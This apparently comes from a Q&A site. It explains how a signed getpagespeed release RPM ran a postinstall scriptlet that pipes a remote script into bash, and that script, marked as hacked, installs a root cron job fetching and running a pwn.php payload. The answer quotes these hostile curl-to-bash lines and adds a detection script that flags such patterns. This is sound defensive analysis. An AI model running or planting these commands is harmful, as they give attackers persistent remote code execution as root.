How did installing this RPM create a file?
```
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
```
https://www.getpagespeed.com/SCM/release-post-install.php contains:
```
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
```
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware, although I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you; both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
```
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <[email protected]>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
```
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or to manually inspect the "post install" script. But unfortunately it almost seems necessary if packages do ill-advised tricks like this.
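
One way to automate the manual scriptlet inspection mentioned in the answer above, as an added example that is not part of the original post: it filters `rpm -qp --scripts` output for lines that download content and hand it straight to a shell. The function names `flag_remote_exec`, `audit_rpm` and `sample_scripts` are hypothetical, and the pattern set is an illustrative assumption that will not catch every way of fetching and running remote code.

```shell
#!/bin/sh
# Added example: flag RPM scriptlet lines that fetch remote content and run it.
# Function names and patterns are assumptions made for this illustration.

# Reads scriptlet text on stdin and prints "<section>: <line>" per risky line.
# Returns 0 if something was flagged, 1 if nothing matched.
flag_remote_exec() {
    awk '
        # rpm prints headers such as: postinstall scriptlet (using /bin/sh):
        /^[a-z]+ scriptlet/ { section = $1; next }
        {
            # a download tool is invoked somewhere on the line
            fetch = ($0 ~ /(^|[^A-Za-z0-9_])(curl|wget)[ \t]/)
            # output piped directly into a shell interpreter
            piped = ($0 ~ /\|[ \t]*(sudo[ \t]+)?(ba|da|z|k)?sh([ \t]|$)/)
            # process substitution form: bash <(curl ...)
            subst = ($0 ~ /(ba|da|z|k)?sh[ \t]+<\(/)
            if (fetch && (piped || subst)) {
                label = (section != "") ? section : "unknown"
                print label ": " $0
                found = 1
            }
        }
        END { exit (found ? 0 : 1) }
    '
}

# Audit a package file before installing it (no scriptlets are executed).
audit_rpm() {
    rpm -qp --scripts "$1" 2>/dev/null | flag_remote_exec
}

# Constructed sample mirroring the scriptlet output quoted above.
sample_scripts() {
    cat <<'EOF'
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
EOF
}
```

Running `audit_rpm` on a downloaded package and refusing to install when it returns 0 gives the check a place in a provisioning script, independent of whether the signature verifies.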